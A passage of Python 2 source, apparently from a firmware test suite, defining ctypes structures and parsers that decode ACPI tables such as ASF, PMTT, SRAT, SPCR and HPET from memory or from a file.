('bits', ASF_boot_options_capabilities_2_bits),
]
class ASF_special_commands_2_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('force_pxe_boot', ctypes.c_uint8, 1),
('force_hard_drive_boot', ctypes.c_uint8, 1),
('force_hard_drive_safe_mode_boot', ctypes.c_uint8, 1),
('force_diagnostic_boot', ctypes.c_uint8, 1),
('force_cd_dvd_boot', ctypes.c_uint8, 1),
('reserved', ctypes.c_uint8, 3),
]
class ASF_special_commands_2(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', ASF_special_commands_2_bits),
]
class ASF_system_capabilities_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('power_cycle_reset_only_on_secure_port', ctypes.c_uint8, 1),
('power_down_only_on_secure_port', ctypes.c_uint8, 1),
('power_on_only_on_secure_port', ctypes.c_uint8, 1),
('reset_only_on_secure_port', ctypes.c_uint8, 1),
('power_cycle_reset_on_compat_or_secure_port', ctypes.c_uint8, 1),
('power_down_on_compat_or_secure_port', ctypes.c_uint8, 1),
('power_on_via_compat_or_secure_port', ctypes.c_uint8, 1),
('reset_only_on_compat_or_secure_port', ctypes.c_uint8, 1),
]
class ASF_system_capabilities(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', ASF_system_capabilities_bits),
]
class ASF_rmcp(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(ASFSubtable._fields_) + [
('boot_options_capabilities_1', ASF_boot_options_capabilities_1),
('boot_options_capabilities_2', ASF_boot_options_capabilities_2),
('boot_options_capabilities_3', ctypes.c_uint8),
('boot_options_capabilities_4', ctypes.c_uint8),
('special_commands_1', ctypes.c_uint8),
('special_commands_2', ASF_special_commands_2),
('system_capabilities', ASF_system_capabilities),
('completion_code', ctypes.c_uint8),
('iana', ctypes.c_uint8 * 4),
('special_command', ctypes.c_uint8),
('special_command_parameter', ctypes.c_uint8 * 2),
('boot_options', ctypes.c_uint8 * 2),
('oem_parameters', ctypes.c_uint8 * 2),
]
def ASF_addr_record_factory(num_devices):
class ASF_addr_record(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(ASFSubtable._fields_) + [
('seeprom_address', ctypes.c_uint8),
('num_devices', ctypes.c_uint8),
('fixed_smbus_addresses', fixed_smbus_address * num_devices),
]
return ASF_addr_record
def ASF_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class ASF_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('information_records', subtables),
]
return ASF_v1
ASF_INFO = 0
ASF_ALRT = 1
ASF_RCTL = 2
ASF_RMCP = 3
ASF_ADDR = 4
def ASF_subtable_list(addr, length):
end = addr + length
field_list = list()
subtable_num = 0
ASF_addr_record_base_len = ctypes.sizeof(ASF_addr_record_factory(0))
ASF_alrt_base = ASF_alrt_factory(0)
ASF_rctl_base = ASF_rctl_factory(0)
while addr < end:
subtable_num += 1
subtable = ASFSubtable.from_address(addr)
if subtable.record_type == ASF_INFO:
cls = ASF_info_record
elif subtable.record_type == ASF_ALRT:
num_alerts = ASF_alrt_base.from_address(addr).number_alerts
cls = ASF_alrt_factory(num_alerts)
elif subtable.record_type == ASF_RCTL:
num_controls = ASF_rctl_base.from_address(addr).number_controls
cls = ASF_rctl_factory(num_controls)
elif subtable.record_type == ASF_RMCP:
cls = ASF_rmcp
elif subtable.record_type == ASF_ADDR:
cls = ASF_addr_record_factory(subtable.record_length - ASF_addr_record_base_len)
else:
            cls = ASF_subtable_unknown_factory(subtable.record_length - ctypes.sizeof(ASFSubtable))
addr += subtable.record_length
field_list.append( ('subtable{}'.format(subtable_num), cls) )
return field_list
def ASF(val):
"""Create class based on decode of an ASF! table from address or filename."""
base_length = ctypes.sizeof(ASF_factory(list()))
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
field_list = ASF_subtable_list(addr + base_length, hdr.length - base_length)
if isinstance(val, str):
return ASF_factory(field_list).from_buffer_copy(data)
return ASF_factory(field_list).from_address(addr)
parse_asf = make_compat_parser("ASF!")
class PCCTSubtable(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('subtype', ctypes.c_uint8),
('length', ctypes.c_uint8),
]
def pcct_subtable_unknown_factory(data_len):
class PCCTSubtableUnknown(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(PCCTSubtable._fields_) + [
('data', ctypes.c_uint8 * data_len),
]
return PCCTSubtableUnknown
class PCCTGenericCommSubspace(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(PCCTSubtable._fields_) + [
('reserved', ctypes.c_uint8 * 6),
('base_address', ctypes.c_uint64),
('mem_range_length', ctypes.c_uint64),
('doorbell_register', GAS),
('doorbell_preserve', ctypes.c_uint64),
('doorbell_write', ctypes.c_uint64),
('nominal_latency', ctypes.c_uint32),
('max_periodic_access_rate', ctypes.c_uint32),
('min_request_turnaround_time', ctypes.c_uint16),
]
class PCCT_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('sci_doorbell', ctypes.c_uint32, 1),
]
class PCCT_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', PCCT_flags_bits),
]
def pcct_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class PCCT_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('flags', PCCT_flags),
('reserved', ctypes.c_uint64),
('pcc_subspace_structures', subtables),
]
return PCCT_v1
PCCT_GENERIC_COMMUNICATION_SUBSPACE = 0
def pcct_subtable_list(addr, length):
end = addr + length
field_list = list()
subtable_num = 0
while addr < end:
subtable_num += 1
subtable = PCCTSubtable.from_address(addr)
if subtable.subtype == PCCT_GENERIC_COMMUNICATION_SUBSPACE:
cls = PCCTGenericCommSubspace
else:
cls = pcct_subtable_unknown_factory(subtable.length - ctypes.sizeof(PCCTSubtable))
addr += subtable.length
field_list.append( ('subtable{}'.format(subtable_num), cls) )
return field_list
def PCCT(val):
"""Create class based on decode of an PCCT table from address or filename."""
base_length = ctypes.sizeof(pcct_factory(list()))
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
field_list = pcct_subtable_list(addr + base_length, hdr.length - base_length)
if isinstance(val, str):
return pcct_factory(field_list).from_buffer_copy(data)
return pcct_factory(field_list).from_address(addr)
parse_pcct = make_compat_parser("PCCT")
PMTT_component_memory_type = {
0b00: 'Volatile memory',
0b01: 'Both volatile and non-volatile memory',
0b10: 'Non-volatile memory',
}
class PMTT_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('top_level_aggregator_device', ctypes.c_uint16, 1),
        ('physical_topology_element', ctypes.c_uint16, 1),
        # bits 2:3; referenced by the 'component_memory_type' entry in _formats below
        ('component_memory_type', ctypes.c_uint16, 2),
    ]
_formats = {
'component_memory_type': unpack.format_table("{}", PMTT_component_memory_type),
}
class PMTT_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint16),
('bits', PMTT_flags_bits),
]
class PMTTSubtable(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('subtype', ctypes.c_uint8),
('reserved1', ctypes.c_uint8),
('length', ctypes.c_uint16),
('flags', PMTT_flags),
('reserved2', ctypes.c_uint16),
]
def PMTTSubtableSocket_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class PMTTSubtableSocket(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(PMTTSubtable._fields_) + [
('socket_identifier', ctypes.c_uint16),
('reserved', ctypes.c_uint16),
('memory_controller_structures', subtables),
]
return PMTTSubtableSocket
def PMTTSubtableMemController_factory(num_proximity_domains, field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class PMTTSubtableMemController(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(PMTTSubtable._fields_) + [
('read_latency', ctypes.c_uint32),
('write_latency', ctypes.c_uint32),
('read_bandwidth', ctypes.c_uint32),
('write_bandwidth', ctypes.c_uint32),
('optimal_access_unit', ctypes.c_uint16),
        ('optimal_access_alignment', ctypes.c_uint16),
('reserved', ctypes.c_uint16),
('number_proximity_domains', ctypes.c_uint16),
('domains', (ctypes.c_uint32 * num_proximity_domains)),
('physical_component_identifier_structures', subtables),
]
return PMTTSubtableMemController
class PMTTSubtableDIMM(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(PMTTSubtable._fields_) + [
('physical_component_id', ctypes.c_uint16),
('reserved', ctypes.c_uint16),
('dimm_size', ctypes.c_uint32),
('smbios_handle', ctypes.c_uint32),
]
def pmtt_subtable_unknown_factory(data_len):
class PMTTSubtableUnknown(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(PMTTSubtable._fields_) + [
('data', ctypes.c_uint8 * data_len),
]
return PMTTSubtableUnknown
def pmtt_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class PMTT_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('reserved', ctypes.c_uint32),
('memory_aggregator_device_structures', subtables),
]
return PMTT_v1
PMTT_SOCKET = 0
PMTT_MEMORY_CONTROLLER = 1
PMTT_DIMM = 2
def pmtt_subtable_list(addr, length):
end = addr + length
field_list = list()
subtable_num = 0
skt_base_length = ctypes.sizeof(PMTTSubtableSocket_factory(list()))
mc_base_cls = PMTTSubtableMemController_factory(0, list())
while addr < end:
subtable_num += 1
subtable = PMTTSubtable.from_address(addr)
if subtable.subtype == PMTT_SOCKET:
next_field_list = pmtt_subtable_list(addr + skt_base_length, subtable.length - skt_base_length)
cls = PMTTSubtableSocket_factory(next_field_list)
elif subtable.subtype == PMTT_MEMORY_CONTROLLER:
base_subtable = mc_base_cls.from_address(addr)
base_length = ctypes.sizeof(PMTTSubtableMemController_factory(base_subtable.number_proximity_domains, list()))
next_field_list = pmtt_subtable_list(addr + base_length, subtable.length - base_length)
cls = PMTTSubtableMemController_factory(base_subtable.number_proximity_domains, next_field_list)
elif subtable.subtype == PMTT_DIMM:
cls = PMTTSubtableDIMM
else:
cls = pmtt_subtable_unknown_factory(subtable.length - ctypes.sizeof(PMTTSubtable))
addr += subtable.length
field_list.append( ('subtable{}'.format(subtable_num), cls) )
return field_list
def PMTT(val):
"""Create class based on decode of an PMTT table from address or filename."""
base_length = ctypes.sizeof(pmtt_factory(list()))
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
field_list = pmtt_subtable_list(addr + base_length, hdr.length - base_length)
if isinstance(val, str):
return pmtt_factory(field_list).from_buffer_copy(data)
return pmtt_factory(field_list).from_address(addr)
parse_pmtt = make_compat_parser("PMTT")
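# Example (a sketch): PMTT aggregator devices nest (socket -> memory controller
# -> DIMM); each level's children come back through the iterable subtables
# classes built by the factories above.
#   pmtt = parse_pmtt()
#   if pmtt is not None:
#       for dev in pmtt.memory_aggregator_device_structures:
#           print dev.subtype, dev.length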
class MPSTMemPowerNode_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('enabled', ctypes.c_uint8, 1),
('power_managed', ctypes.c_uint8, 1),
('hot_pluggable', ctypes.c_uint8, 1),
]
class MPSTMemPowerNode_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', MPSTMemPowerNode_flags_bits),
]
class MPSTState(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('value', ctypes.c_uint8),
('information_index', ctypes.c_uint8),
]
def MPSTMemPowerNode_factory(num_power_states, num_physical_components):
class MPSTMemPowerNode(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('flags', MPSTMemPowerNode_flags),
('reserved', ctypes.c_uint8),
('node_id', ctypes.c_uint16),
('length', ctypes.c_uint32),
('base_address_low', ctypes.c_uint32),
('base_address_high', ctypes.c_uint32),
('length_low', ctypes.c_uint32),
('length_high', ctypes.c_uint32),
('num_power_states', ctypes.c_uint32),
('num_physical_components', ctypes.c_uint32),
('memory_power_nodes', MPSTState * num_power_states),
('physical_component_ids', ctypes.c_uint16 * num_physical_components),
]
return MPSTMemPowerNode
class power_state_structure_id_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('pss_id_value', ctypes.c_uint8, 6),
('pss_id_revision', ctypes.c_uint8, 2),
]
class power_state_structure_id(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', power_state_structure_id_bits),
]
class power_state_structure_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('memory_content_preserved', ctypes.c_uint8, 1),
('autonomous_power_state_entry', ctypes.c_uint8, 1),
('autonomous_power_state_exit', ctypes.c_uint8, 1),
]
class power_state_structure_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', power_state_structure_flags_bits),
]
class MPSTCharacteristics(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('pss_id', power_state_structure_id),
('flags', power_state_structure_flags),
('reserved', ctypes.c_uint16),
('average_power', ctypes.c_uint32),
('relative_power', ctypes.c_uint32),
('exit_latency', ctypes.c_uint64),
('reserved2', ctypes.c_uint32),
]
def mpst_factory(field_list, characteristics_count):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class MPST_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('pcc_id', ctypes.c_uint8),
('reserved', ctypes.c_uint8 * 3),
('memory_power_node_count', ctypes.c_uint16),
('reserved2', ctypes.c_uint16),
('memory_power_nodes', subtables),
('characteristics_count', ctypes.c_uint16),
('reserved3', ctypes.c_uint16),
('characteristics', MPSTCharacteristics * characteristics_count),
]
return MPST_v1
def mpst_subtable_list(addr, memory_power_node_count):
field_list = list()
base_MPSTMemPowerNode = MPSTMemPowerNode_factory(0, 0)
for subtable_num in range(1, memory_power_node_count + 1):
subtable = base_MPSTMemPowerNode.from_address(addr)
cls = MPSTMemPowerNode_factory(subtable.num_power_states, subtable.num_physical_components)
addr += subtable.length
field_list.append( ('subtable{}'.format(subtable_num), cls) )
return field_list
def MPST(val):
"""Create class based on decode of an PMTT table from address or filename."""
base_length = ctypes.sizeof(mpst_factory(list(), 0))
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
mpst = mpst_factory(list(), 0).from_address(addr)
field_list = mpst_subtable_list(ctypes.addressof(mpst.memory_power_nodes), mpst.memory_power_node_count)
mpst = mpst_factory(field_list, 0).from_address(addr)
if isinstance(val, str):
return mpst_factory(field_list, mpst.characteristics_count).from_buffer_copy(data)
return mpst_factory(field_list, mpst.characteristics_count).from_address(addr)
parse_mpst = make_compat_parser("MPST")
class MSCTProximityDomainInfo_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('revision', ctypes.c_uint8),
('length', ctypes.c_uint8),
('proximity_domain_range_low', ctypes.c_uint32),
('proximity_domain_range_high', ctypes.c_uint32),
('max_processor_capacity', ctypes.c_uint32),
('max_memory_capacity', ctypes.c_uint64),
]
def msct_factory(num_proxdominfo):
class MSCT_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('proximity_domain_info_offset', ctypes.c_uint32),
('max_proximity_domains', ctypes.c_uint32),
('max_clock_domains', ctypes.c_uint32),
('max_physical_address', ctypes.c_uint64),
('proximity_domain_info_structs', num_proxdominfo * MSCTProximityDomainInfo_v1),
]
return MSCT_v1
def MSCT(val):
"""Create class based on decode of an MSCT table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
num_tables = (hdr.length - ctypes.sizeof(TableHeader)) / ctypes.sizeof(MSCTProximityDomainInfo_v1)
if isinstance(val, str):
return msct_factory(num_tables).from_buffer_copy(data)
return msct_factory(num_tables).from_address(addr)
parse_msct = make_compat_parser("MSCT")
def msdm_factory(data_len):
"""Create variable-sized MSDM table."""
class MSDM_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('software_licensing_structure', ctypes.c_uint8 * data_len),
]
return MSDM_v1
def MSDM(val):
"""Create class based on decode of an MSDM table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
data_len = hdr.length - ctypes.sizeof(msdm_factory(0))
if isinstance(val, str):
return msdm_factory(data_len).from_buffer_copy(data)
return msdm_factory(data_len).from_address(addr)
parse_msdm = make_compat_parser("MSDM")
def slic_factory(data_len):
"""Create variable-sized SLIC table."""
class SLIC_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('software_licensing_structure', ctypes.c_uint8 * data_len)
]
return SLIC_v1
def SLIC(val):
"""Create class based on decode of an SLIC table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
data_len = hdr.length - ctypes.sizeof(slic_factory(0))
if isinstance(val, str):
return slic_factory(data_len).from_buffer_copy(data)
return slic_factory(data_len).from_address(addr)
parse_slic = make_compat_parser("SLIC")
def slit_factory(num_system_localities):
class SLIT_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('number_system_localities', ctypes.c_uint64),
('relative_distances', ctypes.c_uint8 * num_system_localities * num_system_localities),
]
return SLIT_v1
def SLIT(val):
"""Create class based on decode of an DMAR table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
s = slit_factory(0).from_address(addr)
if isinstance(val, str):
return slit_factory(s.number_system_localities).from_buffer_copy(data)
return slit_factory(s.number_system_localities).from_address(addr)
parse_slit = make_compat_parser("SLIT")
class SRATSubtable(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('subtype', ctypes.c_uint8),
('length', ctypes.c_uint8),
]
class SRATLocalApicAffinity_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('enabled', ctypes.c_uint32, 1),
]
class SRATLocalApicAffinity_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', SRATLocalApicAffinity_flags_bits),
]
class SRATLocalApicAffinity(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(SRATSubtable._fields_) + [
('proximity_domain_7_0', ctypes.c_uint8),
('apic_id', ctypes.c_uint8),
('flags', SRATLocalApicAffinity_flags),
('local_sapic_eid', ctypes.c_uint8),
('proximity_domain_31_8', ctypes.c_uint8 * 3),
('clock_domain', ctypes.c_uint32),
]
class SRATMemoryAffinity_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('enabled', ctypes.c_uint32, 1),
('hot_pluggable', ctypes.c_uint32, 1),
('nonvolatile', ctypes.c_uint32, 1),
]
class SRATMemoryAffinity_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', SRATMemoryAffinity_flags_bits),
]
class SRATMemoryAffinity(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(SRATSubtable._fields_) + [
('proximity_domain', ctypes.c_uint32),
('reserved1', ctypes.c_uint8 * 2),
('base_address_low', ctypes.c_uint32),
('base_address_high', ctypes.c_uint32),
('length_low', ctypes.c_uint32),
('length_high', ctypes.c_uint32),
('reserved2', ctypes.c_uint32),
('flags', SRATMemoryAffinity_flags),
('reserved3', ctypes.c_uint64),
]
class SRATLocalX2ApicAffinity_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('enabled', ctypes.c_uint32, 1),
]
class SRATLocalX2ApicAffinity_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', SRATLocalX2ApicAffinity_flags_bits),
]
class SRATLocalX2ApicAffinity(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(SRATSubtable._fields_) + [
('reserved1', ctypes.c_uint16),
('proximity_domain', ctypes.c_uint32),
('x2apic_id', ctypes.c_uint32),
('flags', SRATLocalX2ApicAffinity_flags),
('clock_domain', ctypes.c_uint32),
('reserved2', ctypes.c_uint32),
]
def SRATSubtableUnknown_factory(_len):
class SRATSubtableUnknown(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(SRATSubtable._fields_) + [
('data', ctypes.c_uint8 * _len),
]
return SRATSubtableUnknown
SRAT_LOCAL_APIC_AFFINITY = 0
SRAT_MEMORY_AFFINITY = 1
SRAT_LOCAL_X2APIC_AFFINITY = 2
def srat_factory(field_list):
class subtables(bits.cdata.Struct):
_pack_ = 1
_fields_ = field_list
def __iter__(self):
for f in self._fields_:
yield getattr(self, f[0])
class SRAT_v3(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('reserved1', ctypes.c_uint32),
('reserved2', ctypes.c_uint64),
('subtables', subtables),
]
def __str__(self):
out = StringIO()
print >>out, "SRAT Summary\n"
mem = [t for t in self.subtables if (t.subtype == SRAT_MEMORY_AFFINITY) and t.flags.bits.enabled]
if mem:
print >>out, "Enabled Memory Affinity Domains"
for m in mem:
domain = m.proximity_domain
addr = (m.base_address_high << 32) + m.base_address_low
len = (m.length_high << 32) + m.length_low
print >>out, "domain = {:#x} base address = {:#016x} length = {:#016x}".format(domain, addr, len)
print >>out
xapic = [t for t in self.subtables if (t.subtype == SRAT_LOCAL_APIC_AFFINITY) and t.flags.bits.enabled]
x2apic = [t for t in self.subtables if (t.subtype == SRAT_LOCAL_X2APIC_AFFINITY) and t.flags.bits.enabled]
if xapic or x2apic:
domain_apicids = {}
print >>out, "Enabled Processor Affinity Domains"
for x in xapic:
domain = (x.proximity_domain_31_8[2] << 24) + (x.proximity_domain_31_8[1] << 16) + (x.proximity_domain_31_8[0] << 8) + x.proximity_domain_7_0
domain_apicids.setdefault(domain, []).append(x.apic_id)
for x2 in x2apic:
domain_apicids.setdefault(x2.proximity_domain, []).append(x2.x2apic_id)
for domain, apicids in domain_apicids.iteritems():
print >>out, "domain={:#x} apicids={}".format(domain, ','.join("{:#x}".format(a) for a in sorted(apicids)))
print >>out
print >>out, super(SRAT_v3, self).__str__()
return out.getvalue()
return SRAT_v3
def SRAT(val):
"""Create class based on decode of an SRAT table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
hdr = TableHeader.from_address(addr)
end = addr + hdr.length
current = addr + ctypes.sizeof(srat_factory(list()))
field_list = list()
subtable_num = 0
while current < end:
subtable_num += 1
subtable = SRATSubtable.from_address(current)
current += subtable.length
if subtable.subtype == SRAT_LOCAL_APIC_AFFINITY:
cls = SRATLocalApicAffinity
elif subtable.subtype == SRAT_MEMORY_AFFINITY:
cls = SRATMemoryAffinity
elif subtable.subtype == SRAT_LOCAL_X2APIC_AFFINITY:
cls = SRATLocalX2ApicAffinity
else:
            cls = SRATSubtableUnknown_factory(subtable.length - ctypes.sizeof(SRATSubtable))
field_list.append( ('subtable{}'.format(subtable_num), cls) )
if isinstance(val, str):
return srat_factory(field_list).from_buffer_copy(data)
return srat_factory(field_list).from_address(addr)
def parse_srat(printflag=False, EnabledOnly=False, instance=1):
"""Parse and optionally print an SRAT table."""
srat = parse_table("SRAT", instance)
if srat is None:
return None
if printflag:
with ttypager.page():
print srat
if EnabledOnly:
with ttypager.page():
print '\n'.join(str(subtable) for subtable in srat.subtables if subtable.flags.bits.enabled)
return srat
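# Example usage (a sketch, assuming the firmware publishes an SRAT and ACPICA
# initialized successfully):
#   srat = parse_srat()           # decode only, returns the table object
#   parse_srat(printflag=True)    # also page the decoded table and summary
#   parse_srat(EnabledOnly=True)  # page only the enabled affinity subtables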
def _asid_str(asid):
if asid >= 0xC0 and asid <= 0xff:
return 'OEM Defined'
_asid = {
ASID_SYSTEM_MEMORY: 'System Memory',
ASID_SYSTEM_IO: 'System IO',
ASID_PCI_CFG_SPACE: 'PCI Configuration Space',
ASID_EMBEDDED_CONTROLLER: 'Embedded Controller',
ASID_SMBUS: 'SMBus',
ASID_PCC: 'Platform Communications Channel (PCC)',
ASID_FFH: 'Functional Fixed Hardware',
}
return _asid.get(asid, 'Reserved')
class flow_control_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('DCD', ctypes.c_uint8, 1),
('RTSCTS', ctypes.c_uint8, 1),
('XONXOFF', ctypes.c_uint8, 1),
]
class flow_control(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', flow_control_bits),
]
# Decode for baud rate the BIOS used for redirection
baud = {
3: 9600,
4: 19200,
6: 57600,
7: 115200,
}
def _format_baud(val):
return baud.get(val, 'Reserved')
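# Per the decode table above, _format_baud(7) yields 115200, and any value not
# listed decodes as 'Reserved'.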
class SPCR_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('interface_type', ctypes.c_uint8),
('reserved0', ctypes.c_uint8 * 3),
('base_address', GAS),
('int_type', ctypes.c_uint8),
('irq', ctypes.c_uint8),
('global_sys_int', ctypes.c_uint32),
('baud_rate', ctypes.c_uint8),
('parity', ctypes.c_uint8),
('stop_bits', ctypes.c_uint8),
('flow_control', flow_control),
('terminal_type', ctypes.c_uint8),
('reserved1', ctypes.c_uint8),
('pci_did', ctypes.c_uint16),
('pci_vid', ctypes.c_uint16),
('pci_bus', ctypes.c_uint8),
('pci_dev', ctypes.c_uint8),
('pci_func', ctypes.c_uint8),
('pci_flags', ctypes.c_uint32),
('pci_segment', ctypes.c_uint8),
('reserved2', ctypes.c_uint8 * 4)
]
_formats = {
'baud_rate': unpack.format_function("{}", _format_baud),
'parity': unpack.format_table("{}", { 0: 'No Parity' }),
'stop_bits': unpack.format_table("{}", { 1: '1 stop bit' }),
}
def SPCR(val):
"""Create class based on decode of an SPCR table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
return SPCR_v1.from_buffer_copy(data)
return SPCR_v1.from_address(addr)
parse_spcr = make_compat_parser("SPCR")
class event_timer_block_id_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('hardware_rev_id', ctypes.c_uint32, 8),
('num_comparators', ctypes.c_uint32, 5),
('count_size_cap_counter_size', ctypes.c_uint32, 1),
('reserved', ctypes.c_uint32, 1),
('legacy_replacement_IRQ_routing_capable', ctypes.c_uint32, 1),
('pci_vid', ctypes.c_uint32, 16),
]
class event_timer_block_id(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', event_timer_block_id_bits),
]
_page_protection_table = {
0: 'No Guarantee for page protection',
1: '4KB page protected',
2: '64KB page protected',
}
class hpet_capabilities_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('page_protection', ctypes.c_uint8, 4),
('oem_attributes', ctypes.c_uint8, 4),
]
_formats = {
'page_protection': unpack.format_table("{:#x}", _page_protection_table),
}
class hpet_capabilities(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', hpet_capabilities_bits),
]
class HPET_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('event_timer_block_id', event_timer_block_id),
('base_address', GAS),
('hpet_number', ctypes.c_uint8),
('main_counter_min_clock_tick_in_periodic_mode', ctypes.c_uint16),
('capabilities', hpet_capabilities),
]
def HPET(val):
"""Create class based on decode of an HPET table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
return HPET_v1.from_buffer_copy(data)
return HPET_v1.from_address(addr)
parse_hpet = make_compat_parser("HPET")
def uefi_factory(data_len):
class UEFI_v1(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('header', TableHeader),
('identifier', bits.cdata.GUID),
('data_offset', ctypes.c_uint16),
('data', ctypes.c_uint8 * data_len),
]
_formats = {
'identifier': bits.cdata._format_guid,
}
return UEFI_v1
def UEFI(val):
"""Create class based on decode of an UEFI table from address or filename."""
addr = val
if isinstance(val, str):
data = open(val).read()
buf = ctypes.create_string_buffer(data, len(data))
addr = ctypes.addressof(buf)
u = TableHeader.from_address(addr)
data_len = u.length - ctypes.sizeof(uefi_factory(0))
if isinstance(val, str):
return uefi_factory(data_len).from_buffer_copy(data)
